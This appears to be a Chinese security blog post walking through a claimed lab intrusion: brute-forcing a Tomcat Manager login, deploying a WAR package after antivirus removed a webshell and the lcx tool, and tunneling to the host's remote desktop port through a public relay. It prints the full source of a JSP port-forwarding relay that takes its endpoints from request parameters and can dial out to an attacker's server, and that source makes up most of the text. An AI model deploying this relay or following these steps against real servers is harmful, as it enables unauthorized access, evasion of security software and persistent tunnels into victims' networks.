通过JSP端口转发拿下服务器权限

2022-09-22 10:01:33

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

这篇文章是@欧根亲王号师傅19年投稿发在星球的,经他同意转发至公众号,内容比较基础。

记得他当时是在本地模拟的一个实战场景来做的这个测试实验(绕过安全防护进行端口转发)。

0x01 环境简要

目标主机:Windows

目标防护软件:Antimalware

目标环境:JSP,Tomcat,Apache

本地主机:Windows、Kali

所需工具:Apache爆破工具,Lcx,JSP代码,公网IP主机一个

所遇见问题:lcx被杀,webshell被杀

0x02 进攻说明

一、爆破登录口令

爆破Tomcat Web Application Manager,这里不做深入说明,大家都懂的

二、上传webshell

由于服务器上防护软件问题,上传的webshell被杀,lcx工具被杀,这里采取以jsp转发端口的形式来绕过

三、准备jsp页面的war包

使用kali把准备好的jsp页面打包,进入jsp页面目录下执行以下命令打包

jar -cvf aces.war

四、通过已有webshell创建用户名密码

五、通过后台部署war包

六、设置lcx监听本地端口并转发

使用lcx监听本地55并转发到3399端口上

七、访问jsp文件,并设置相关转发参数

参数说明:
lip=127.0.0.1
lp=需要转发的本地端口
rip=公网监听IP
rp=公网IP监听的端口号
m=转发的模式

0x03 验证

成功登录,自此本次实验结束

0x04 JSP源码

<%@page pageEncoding="GBK"%>
<%@page import="java.io.*"%>
<%@page import="java.util.*"%>
<%@page import="java.nio.charset.*"%>
<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import="java.net.*"%>
<%
/*code by KingX*/
/**
 * TCP relay primitives embedded in this JSP; the scriptlet that follows
 * instantiates it with values read straight from the HTTP request.
 * Three modes exist: {@link #listen} (accept on two local ports and bridge
 * the two clients), {@link #tran} (accept on one address/port and forward
 * every connection to a fixed target) and {@link #slave} (dial out to two
 * endpoints and bridge them).
 *
 * NOTE(review): every socket and thread created here lives inside the
 * servlet container's JVM, so the observable artefacts are listening ports
 * and outbound connections owned by that container process rather than by
 * a separate executable, plus extra unnamed threads in the JVM. The class is
 * declared inside a scriptlet, so the container compiles it as a local class
 * of the generated service method; that is why the helpers below are nested.
 */
class KPortTran {
  /**
   * Accepts one connection on each of two local ports and pipes the pair
   * together, repeatedly. Runs on the calling thread and has no exit other
   * than an exception, so a caller never gets control back.
   *
   * @param port1 first local port to bind (parsed with Integer.parseInt)
   * @param port2 second local port to bind
   */
  public void listen(String port1, String port2) {
    ServerSocket listenServerSocket = null;
    ServerSocket outServerSocket = null;
    try {
      listenServerSocket = new ServerSocket(Integer.parseInt(port1));
      outServerSocket = new ServerSocket(Integer.parseInt(port2));
    } catch (NumberFormatException e) {
      // Swallowed: a bad or unbindable port leaves the ServerSocket null; the
      // accept() below then throws a NullPointerException that the generic
      // catch further down also hides. Nothing is reported to the caller.
    } catch (IOException e) {
    }
    Socket listenSocket = null;
    Socket outSocket = null;
    try {
      while (true) {  
        // Pair one client from each listener, start one pipe per direction.
        listenSocket = listenServerSocket.accept();
        outSocket = outServerSocket.accept();
        new tranThread(outSocket, listenSocket).start();
        new tranThread(listenSocket, outSocket).start();
        Thread.sleep(200);
      }
    } catch (Exception e) {  
      // Any failure (including the null case above) ends the loop silently.
      // Neither ServerSocket is ever closed here.
    }
  }

  /**
   * Outbound ("reverse") bridge: connects from this host to
   * {@code srcIP:port2} and to {@code targetIP:port1}, then relays between
   * the two (see Server with reverse == true). Note the argument pairing:
   * Server receives (src, p2) and (dest, p1), the inverse of {@link #tran}.
   *
   * @throws IOException if either host name cannot be resolved
   * @throws NumberFormatException (unchecked) if a port does not parse
   */
  public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {
    InetAddress src = InetAddress.getByName(srcIP);
    InetAddress dest = InetAddress.getByName(targetIP);
    int p1 = Integer.parseInt(port1);
    int p2 = Integer.parseInt(port2);
    // Constructing a Server already starts its thread; the reference is dropped.
    new Server(src, p2, dest, p1, true);
  }

  /**
   * Inbound forwarder: binds {@code srcIP:port1} and, for every accepted
   * connection, opens a new connection to {@code targetIP:port2} and relays
   * both directions (see Server with reverse == false).
   *
   * @throws IOException if either host name cannot be resolved
   * @throws NumberFormatException if a port does not parse
   */
  public void tran(String srcIP, String port1, String targetIP, String port2)
      throws NumberFormatException, IOException {
    InetAddress src = InetAddress.getByName(srcIP);
    InetAddress dest = InetAddress.getByName(targetIP);
    int p1 = Integer.parseInt(port1);
    int p2 = Integer.parseInt(port2);
    // Constructing a Server already starts its thread; the reference is dropped.
    new Server(src, p1, dest, p2, false);
  }
/**
 * One-directional pipe thread: copies bytes from {@code in}'s input stream
 * to {@code out}'s output stream until either socket has been closed locally
 * or EOF is read, then closes both sockets. Callers always start two
 * instances per connection pair, one per direction.
 */
class tranThread extends Thread {
  Socket in;
  Socket out;
  InputStream is;
  OutputStream os;
  /**
   * @param in  socket to read from
   * @param out socket to write to
   * @throws IOException if either stream cannot be obtained
   */
  public tranThread(Socket in, Socket out) throws IOException {
    this.is = in.getInputStream();
    this.os = out.getOutputStream();
    this.in = in;
    this.out = out;
  }

  /** Closes both streams and both sockets; any IOException is discarded. */
  private void closeSocket() {
    try {
      is.close();
      os.close();
      in.close();
      out.close();
    } catch (IOException e) {
    }
  }
  @Override
  public void run() {
    // The thread was created without a Runnable, so super.run() is a no-op.
    super.run();
    byte[] buffer = new byte[4096];
    int len = -1;
    try {
      while (true) {
        // isClosed() only reflects a local close(); a peer hang-up is seen as
        // read() returning -1. Otherwise the chunk is forwarded unmodified.
        if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {
          break;
        } else {
          os.write(buffer, 0, len);
          os.flush();  
        }
      }
    } catch (IOException e) {
      closeSocket();
    } finally {
      // Also runs after the catch, so the pair may be closed twice; at worst
      // the second attempt raises an IOException that closeSocket() discards.
      closeSocket();
    }
  }
}


/**
 * Relay thread that starts itself from its own constructor. With
 * {@code reverse == false} it listens on {@code src:p1} and forwards each
 * accepted client to {@code dest:p2}; with {@code reverse == true} it dials
 * both {@code src:p1} and {@code dest:p2} itself and keeps that pair bridged.
 */
class Server extends Thread {
  InetAddress src;
  InetAddress dest;
  int p1, p2;
  boolean reverse = false;

  /**
   * Stores the endpoints and immediately calls {@link #start()}, so merely
   * constructing a Server launches the relay thread (start() from a
   * constructor is something a reviewer would normally flag).
   *
   * @param srcIP      address to listen on (tran) or first dial target (reverse)
   * @param srcPort    port paired with srcIP
   * @param targetIP   forward target (tran) or second dial target (reverse)
   * @param targetPort port paired with targetIP
   * @param flag       true selects the outbound/reverse behaviour
   */
  public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,
      int targetPort, boolean flag) {
    this.src = srcIP;
    this.dest = targetIP;
    this.p1 = srcPort;
    this.p2 = targetPort;
    this.reverse = flag;
    start();
  }

  @Override
  public void run() {
    // The thread was created without a Runnable, so super.run() is a no-op.
    super.run();
    if (reverse) {
      try {
        Socket s = new Socket(src, p1);
        Socket s2 = new Socket(dest, p2);
        new tranThread(s, s2).start();
        new tranThread(s2, s).start();

        // Poll once a second and redial whichever side has been closed, then
        // start a fresh pair of pipes. Because tranThread.closeSocket() closes
        // both sockets of a pair, in practice both sides usually show up as
        // closed together and both are redialed. A failed redial raises an
        // IOException, which ends this thread silently (empty catch below).
        while (true) {
          if (s2.isClosed() || s.isClosed()) {
            if (s2.isClosed()) {
              s2 = new Socket(dest, p2);
            }
            if (s.isClosed()) {
              s = new Socket(src, p1);
            }
            new tranThread(s, s2).start();
            new tranThread(s2, s).start();
          }
          Thread.sleep(1000);
        }
      } catch (IOException e) {
      } catch (InterruptedException e) {
        // Interrupt status is not restored here.
      }

    } else {
      ServerSocket ss;
      try {
        // Backlog 5, bound to the supplied local address; never closed.
        ss = new ServerSocket(p1, 5, src);

        while (true) {
          Socket s = ss.accept();
          // If the target refuses, the IOException leaves the accept loop for
          // good and the just-accepted client socket s is left open.
          Socket s2 = new Socket(dest, p2);
          new tranThread(s, s2).start();
          new tranThread(s2, s).start();
        }
      } catch (IOException e) {
        // The only branch in the class that reports anything, and only to System.err.
        e.printStackTrace();
      }
    }
  }
}
}
%>
<%
// Every relay endpoint is taken verbatim from the request parameters; this
// page performs no authentication, no validation and no logging of its own.
final String localIP = request.getParameter("lip");
final String localPort = request.getParameter("lp");
final String localPort2 = request.getParameter("lp2");   // consumed only by the "listen" mode
final String remoteIP =request.getParameter("rip");
final String remotePort =request.getParameter("rp");
final String mode =request.getParameter("m");

KPortTran pt = new KPortTran();
// mode is dereferenced without a null check: a request that lacks "m" fails
// here with a NullPointerException. The three modes are not exclusive in
// structure, but a single string can only match one of them.
if (mode.equals("tran")) {
  // Returns immediately; the Server thread it creates outlives this request
  // and keeps running for as long as the container's JVM does.
  pt.tran(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("slave")) {
  // Same as above: the outbound relay persists after the response is sent.
  pt.slave(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("listen")) {
  // Unlike the other two, listen() loops on this request thread and never
  // returns normally, so the response is never completed.
  pt.listen(localPort, localPort2);
}

%>
